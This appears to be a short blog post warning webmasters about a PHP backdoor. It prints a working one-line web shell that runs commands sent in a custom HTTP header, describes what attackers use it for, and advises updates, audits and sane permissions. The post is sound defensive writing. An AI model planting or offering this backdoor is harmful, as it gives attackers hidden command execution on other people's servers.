Are you a webmaster who is concerned about hackers infesting your sites? Well, be on the look out for crud like this:

<? passthru(getenv(”HTTP_ACCEPT_jayman”)); ?>

This script can be used by sending whatever command you want in a “Accept-jayman:” HTTP header. “jayman” is just an example (a prevelant one), it could be anything. This can be placed to any of your PHP scripts without affecting your user’s experience, because the header is not something sent by any browser. Headers are also not typically logged anywhere, so the attacker may not be caught by inspecting logs.

I’ve seen this come up quite often, and it actually seems to be getting worse. Most of the time the attackers just want a place to run an IRC bot (iroffer), but often they want to redirect your surfers to their affiliate program links, send spam, or use your site to host their spam advertised content.

If you see something like this in your scripts, or on its own, it was put there by an attacker using another exploitable script on your site. It’s very important to keep your site’s scripts up-to-date, and it’s a good idea to hire someone to audit your code or keep it up to date, if you’re not a programmer yourself. (Be aware that whoever you hire may not actually be able to debug all of your scripts, if any of them use Zend Encoder created files.)

It’s also important to make sure your permissions are not overly open. PHP scripts, typically, run as the web server’s user. If your directory permissions are open (777, for example), and you have an exploitable script, someone could easily create their own files in the directory, and even replace your files with their own copies.

Ultimately, the best advice I can give is to check your site’s contents often, keep your software up to date, keep your permissions sane, and hire someone knowledgable and trustworthy to check out your site if find you need help.